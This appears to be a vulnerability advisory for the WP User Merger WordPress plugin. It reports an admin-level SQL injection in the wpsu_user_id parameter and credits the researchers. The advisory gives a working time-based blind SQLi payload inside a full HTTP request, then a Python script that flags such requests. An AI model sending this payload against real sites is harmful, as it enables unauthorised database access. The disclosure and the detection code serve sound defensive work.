The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
As admin, go to the plugin's settings (Users > WP User Merger), open the Optional tab and enable the "Make User List Searchable (AJAX Based)" option. Reload the settings and go to the "DB User Merger" tab, search for a user, intercept the request made with the action=wpsu_get_user_assets parameter and change the wpsu_user_id parameter to the following payload:

-1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)

Example:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close
Cookie: [admin+]

action=wpsu_get_user_assets&wpsu_user_id=-1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&wpsu_nonce=4afb1e4faa

This will result in a delayed request.
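
A detection check for the request described above, added here as an example (not code from the plugin or from the advisory): it flags POST bodies for this AJAX action whose wpsu_user_id is not a single plain integer. The function names, the assumption that legitimate values are numeric WordPress user IDs, and all sample bodies except the one quoted in the advisory are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ACTION = "wpsu_get_user_assets"  # AJAX action named in the advisory
PARAM = "wpsu_user_id"           # parameter the advisory reports as injectable
_DIGITS = re.compile(r"[0-9]{1,20}")  # assumption: valid values are numeric user IDs


def classify(body):
    """Classify one form-encoded admin-ajax.php POST body.

    Returns (verdict, detail) with verdict "ignore", "ok" or "flag".
    """
    # parse_qs URL-decodes, so "+" and %xx encoding is normalised first.
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return ("ignore", "other action")
    values = fields.get(PARAM, [])
    if len(values) != 1:
        # Missing or repeated parameter: the backend may read a different copy.
        return ("flag", f"{PARAM} appears {len(values)} times")
    if not _DIGITS.fullmatch(values[0]):
        return ("flag", f"{PARAM} is not a plain integer: {values[0]!r}")
    return ("ok", values[0])


def scan(bodies):
    """Return (index, detail) for every body that classify() flags."""
    hits = []
    for i, body in enumerate(bodies):
        verdict, detail = classify(body)
        if verdict == "flag":
            hits.append((i, detail))
    return hits


# Constructed sample bodies; SAMPLES[1] is the request body quoted in the advisory.
SAMPLES = [
    "action=wpsu_get_user_assets&wpsu_user_id=12&wpsu_nonce=0000000000",
    "action=wpsu_get_user_assets&wpsu_user_id=-1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&wpsu_nonce=4afb1e4faa",
    "action=heartbeat&interval=60",
    "action=wpsu_get_user_assets&wpsu_user_id=3&wpsu_user_id=4&wpsu_nonce=0000000000",
]

if __name__ == "__main__":
    for index, detail in scan(SAMPLES):
        print(index, detail)
```

The same digits-only rule is what a server-side fix enforces before the value reaches the SQL statement, so a flagged request is one a patched handler would reject.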
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Kunal Sharma
Yes
2022-11-07 (about 4 months ago)
2022-11-07 (about 4 months ago)
2022-12-02 (about 3 months ago)